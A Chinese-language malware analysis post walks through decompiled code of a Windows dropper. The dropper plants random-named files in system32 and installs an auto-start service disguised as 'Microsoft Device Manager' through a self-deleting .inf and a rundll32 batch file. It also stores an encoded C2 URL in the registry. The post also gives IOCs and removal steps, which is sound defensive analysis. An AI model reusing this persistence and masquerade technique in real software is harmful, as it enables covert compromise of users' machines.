在吾爱破解论坛上面找的样本, 有的加了比较难点的壳. 无奈, 只能找一些没壳的或者简单壳的来分析. 这次分析的算是有点难度, 拭目以待.
程序执行后会在系统目录下释放一个 EXE 和一个 DLL (文件名随机生成), 并通过 .inf 安装一个名为 X6Remote 的自启动服务 (StartType=2, DisplayName 伪装成 "Microsoft Device Manager").
WinMain
...
/*
 * Look for an Rstray.exe process. RsTray.exe is the real-time monitor of Rising
 * (瑞星) antivirus. If it is running, spawn a thread (sub_401240) that does little
 * more than create a window and run a message loop. The original analyst did not
 * know why; a plausible reading is that the sample wants to look like an ordinary
 * GUI application to Rising's behaviour monitor, but nothing in this excerpt
 * confirms that - treat it as a hypothesis.
 * NOTE(review): CreateThread is resolved at run time via LoadLibraryA/GetProcAddress
 * rather than through the import table, so the string "CreateThread" is in the
 * binary but the API is not statically imported - a weak import-hiding trick.
 */
if ( getProcessID(&Rstray.exe) ) {
LibFileName = 'kernel32.dll';
v6 = LoadLibraryA(&LibFileName);
CreateThread = GetProcAddress(v6, aCreatethread);
(CreateThread)(0, 0, sub_401240, 0, 0, 0); // default security/stack, no flags, thread id discarded
Sleep(0x64u); // 100 ms - give the window thread time to come up
}
...
/*
 * Build the drop paths. Both the DLL and the EXE get a random six-letter lowercase
 * name under the system directory (GetSystemDirectoryA, typically C:\WINDOWS\system32);
 * the file contents are written later from the sample's resources.
 * sub_401480(0x1Au) evidently returns a value in [0, 26), so each `+ 'a'` yields one
 * random letter a-z (six per name; the sixth is added inside the wsprintfA call).
 * NOTE(review): because the names are random there is no fixed file-name IOC here;
 * detection has to key on the service name / DisplayName written later, or on a
 * non-Microsoft binary appearing in system32.
 */
...
GetSystemDirectoryA = GetProcAddress(v8, &GSD); // resolved dynamically, like CreateThread above
(GetSystemDirectoryA)(&String1, 0x104); // 0x104 == MAX_PATH
lstrcatA(&String1, asc_4045C4); // "\" path separator
lstrcpyA(&FileName, &String1); // FileName starts from the same "<sysdir>\" prefix
v10 = sub_401480(0x1Au) + 'a';
v11 = sub_401480(0x1Au) + 'a';
v12 = sub_401480(0x1Au) + 'a';
v13 = sub_401480(0x1Au) + 'a';
v14 = sub_401480(0x1Au) + 'a';
v15 = sub_401480(0x1Au);
wsprintfA(&String2, aCCCCCC_dll, v15 + 'a', v14, v13, v12, v11, v10);// random DLL name; format presumably "%c%c%c%c%c%c.dll"
lstrcpyA(Data, &String2); // bare DLL file name; apparently the same Data later stored in the registry as DLL_Name
lstrcatA(&String1, Data);
DeleteFileA(&String1); // String1 is <sysdir>\<random>.dll - remove any stale copy before dropping
v16 = sub_401480(0x1Au) + 'a';
v17 = sub_401480(0x1Au) + 'a';
v18 = sub_401480(0x1Au) + 'a';
v19 = sub_401480(0x1Au) + 'a';
v20 = sub_401480(0x1Au) + 'a';
v21 = sub_401480(0x1Au);
wsprintfA(&v33, aCCCCCC, v21 + 'a', v20, v19, v18, v17, v16); // random stem only, presumably "%c%c%c%c%c%c"
lstrcatA(&FileName, &v33);
lstrcatA(&FileName, a_exe); // ".exe" - FileName is <sysdir>\<random>.exe
DeleteFileA(&FileName);
0x401DC0
总体分析: 生成两个文件, 一个 .bat, 另一个 .inf. 利用 .bat (rundll32.exe setupapi,InstallHinfSection) 执行 .inf 来安装服务, 然后将两者删除. 我平常使用 Process Monitor, 这时候只看见了写入两个文件, 却找不到文件, 增加了一点难度 —— 原因是下面的代码在 WinExec 之后只 Sleep(3000) 就把 .inf 和 .bat 都删掉了, 两个文件在磁盘上只存在约 3 秒. 取证时可以在 DeleteFileA 上下断点, 或用 Process Monitor / Sysmon 记录文件创建/删除事件来恢复内容.
...
(GetSystemDirectoryA)(&v36, 0x104); // v36 = system directory (0x104 == MAX_PATH)
v15 = sub_401480(0x1Au) + 'a';
v16 = sub_401480(0x1Au) + 'a';
v17 = sub_401480(0x1Au) + 'a';
v18 = sub_401480(0x1Au) + 'a';
v19 = sub_401480(0x1Au) + 'a';
v20 = sub_401480(0x1Au);
wsprintfA(&v43, aCCCCCC, v20 + 'a', v19, v18, v17, v16, v15); // random six-letter stem; NOT used for the two paths below in this excerpt
/*
 * NOTE(review): IDA names string literals after their content, so aSOwy1815552_in and
 * aSOwy1815552_ba are most likely "%s\Owy1815552.inf" and "%s\Owy1815552.bat" - i.e.
 * FIXED file names (only the directory comes from %s), not the random names the
 * original comments suggest; the random stem in v43 is never consumed here. If so,
 * <sysdir>\Owy1815552.inf / .bat is a usable host IOC - confirm against the IDB strings.
 */
wsprintfA(&FileName, aSOwy1815552_in, &v36); // <sysdir>\...inf
wsprintfA(&v37, aSOwy1815552_ba, &v36); // <sysdir>\...bat
memset(&v41, 0, 0xF8u);
qmemcpy(&v32, aSignatureWindo, 0x19u); // Signature="$WINDOWS NT$" - 24 chars + NUL = 0x19 bytes
memset(&v33, 0, 0xE8u);
v34 = 0;
v35 = 0;
/*
 * NOTE(review): the analyst's labels are one slot off. CreateFileA's 3rd argument is
 * dwShareMode, so the value labelled CREATE_ALWAYS here is really 2 == FILE_SHARE_WRITE
 * (compare the raw .bat call below: 0x40000000, 2, 0, 2, 0x80, 0). The 5th argument,
 * 2, is the real CREATE_ALWAYS and 0x80 is FILE_ATTRIBUTE_NORMAL.
 */
v21 = (CreateFileA)(&FileName, GENERIC_WRITE, CREATE_ALWAYS,0, 2, 0x80, 0);
v22 = lstrlenA(String);
wrireFile(v21, String, v22 + 1, &varC, 0); // "wrireFile" is the analyst's label for WriteFile; writes String plus its NUL
v22 = lstrlenA(String);
wrireFile(v21, String, v22 + 1, &varC, 0); // String is written a second time in this listing - transcription slip or real; if real, the first copy and its NUL stay embedded in the file
SFP(v21, -1, 0, 1); // SetFilePointer(h, -1, NULL, FILE_CURRENT): back over the NUL just written so the next line continues the text
v23 = lstrlenA(&v32);
wrireFile(v21, &v32, v23 + 1, &varC, 0); // no CloseHandle(v21) is visible in this excerpt before the WritePrivateProfileStringA calls
/*
 * Writes
 * [Version]
 * Signature="$WINDOWS NT$"
 */
wsprintfA(&v29, aSS_0, X6Remote, aMy_addservice_);// -> "X6Remote,,My_AddService_Name" (service name, empty flags, install section)
WritePrivateProfileStringA(AppName, KeyName, &v29, &FileName);// [DefaultInstall.Services] AddService=X6Remote,,My_AddService_Name
WritePrivateProfileStringA(aMy_addservice_, aDisplayname, Microsoft_Device_Manager, &FileName);// [My_AddService_Name] DisplayName=Microsoft Device Manager - masquerades as a Microsoft service
WritePrivateProfileStringA(aMy_addservice_, aDescription, watch, &FileName);// Description (Chinese text, see the rendered .inf below)
WritePrivateProfileStringA(aMy_addservice_, aServicetype, a0x10, &FileName);// ServiceType=0x10 == SERVICE_WIN32_OWN_PROCESS
WritePrivateProfileStringA(aMy_addservice_, aStarttype, a2, &FileName);// StartType=2 == SERVICE_AUTO_START: runs at every boot -> persistence
WritePrivateProfileStringA(aMy_addservice_, aErrorcontrol, a0, &FileName);// ErrorControl=0 == SERVICE_ERROR_IGNORE
...
WritePrivateProfileStringA(aMy_addservice_, ServiceBinary, XXXXX.exe, &FileName); // ServiceBinary = the random <sysdir>\<random>.exe dropped earlier
.inf
的内容:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=X6Remote,,My_AddService_Name
[My_AddService_Name]
DisplayName=Microsoft Device Manager
Description=监测和监视新硬件设备并自动更新设备驱动。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\WINDOWS\system32\xxxxx.exe
写入.bat
wsprintfA(&v31, &rundll32.exe, &FileName); // command line for the .bat, %s = the .inf path
// rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %s
/*
 * InstallHinfSection runs the INF's [DefaultInstall] section, which installs the
 * X6Remote service. Per the SetupAPI docs, mode 128 (0x80) means "use the INF's own
 * directory as the default source path" and the low reboot bits are 0 = never reboot.
 * NOTE(review): creating a service writes HKLM\SYSTEM\...\Services, so this only works
 * with administrative rights (the norm on the XP-era hosts this sample targets).
 * rundll32.exe with a "setupapi,InstallHinfSection" command line spawned from cmd.exe
 * is a well-known LOLBin pattern and a good detection/alerting point.
 */
v24 = (CreateFileA)(&v37, 0x40000000, 2, 0, 2, 0x80, 0); // GENERIC_WRITE, FILE_SHARE_WRITE, no SA, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
v25 = lstrlenA(&v31);
/*
 * File content: rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 <sysdir>\xxxxx.inf
 */
wrireFile(v24, &v31, v25 + 1, &v132, 0); // <sysdir>\xxxxx.bat (the trailing NUL is written too)
CloseHandle(v24);
Rstray.exe = 'RsTray.exe';
if ( getProcessID(&Rstray.exe) ) // same Rising check / window-thread trick as in WinMain
{
v26 = LoadLibraryA(LibFileName);
CreateThread = GetProcAddress(v26, aCreatethread);
(CreateThread)(0, 0, sub_401240, 0, 0, 0);
Sleep(0x64u); // 100 ms
}
(WinExec)(&v37, 0); // run the .bat; uCmdShow 0 == SW_HIDE, so no visible console. WinExec does not wait for the batch to finish
Sleep(3000u); // 3 s for rundll32/setupapi to process the INF; on a slow host the INF below could be deleted before it is read
DeleteFileA(&FileName); // delete the .inf - the two files live on disk for only ~3 s (anti-forensics)
return DeleteFileA(&v37); // delete the .bat
释放 .exe 和 .dll 文件调用的都是函数 0x4014A0 (原文写作 ".exe 和 .inf", 但 .inf 是上面用 WritePrivateProfileStringA 逐项写出的, 这里应指从资源中释放的 DLL), 只是参数不一样. 步骤: FindResource --> LoadResource --> CreateFile --> SizeofResource --> WriteFile, 很常规的资源释放流程.
/*
 * Persist the bot's configuration under HKLM\<SubKey> (SubKey itself is not visible in
 * this excerpt - read it from the IDB). These four values are the per-sample IOCs worth
 * collecting: the random DLL name, the group tag, the encoded URL and the loader path.
 * NOTE(review): writing HKLM needs admin rights, consistent with the service install.
 */
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, ValueName, REG_SZ, Data, v22, 0);// DLL_Name: the randomly generated DLL file name
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aConnectgroup, REG_SZ, aMS, v23, 0);// ConnectGroup: default group tag (string symbol aMS)
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aUrl, REG_SZ, aAaaaaa87xz6eii, v24, 0);// URL: AAAAAA/87xz6eIiIuLp+TL/LOPiYmJiZk= - looks encoded (base64-like alphabet, trailing '='), presumably the C2 address; not decoded here
regSetValue(HKEY_LOCAL_MACHINE, &SubKey, aLoad_path, 1u, &String, v25, 0);// Load_Path: <sysdir>\<random>.exe; 1u == REG_SZ
总结: 注册表中写入的是配置信息 (DLL_Name, ConnectGroup, 编码后的 URL, Load_Path), .inf 负责安装并自启动 X6Remote 服务, 两者相互补充: 服务提供持久化, 注册表提供运行时配置 (推测由释放的 EXE/DLL 读取, 需在下一篇分析中确认).
StartService
清除方法: 先停止并删除 X6Remote 服务 (sc stop X6Remote / sc delete X6Remote, 或删除 HKLM\SYSTEM\CurrentControlSet\Services\X6Remote), 同时删除上面 regSetValue 写入的配置项, 然后重启电脑; 再不放心可以按服务的 ServiceBinary / 注册表中的 Load_Path 和 DLL_Name 找到并删除释放的 EXE 和 DLL 文件 (文件名随机, 需先从注册表中确认路径). 下一篇文章分析释放的 EXE 文件.
吾爱破解
对应IDB数据库下载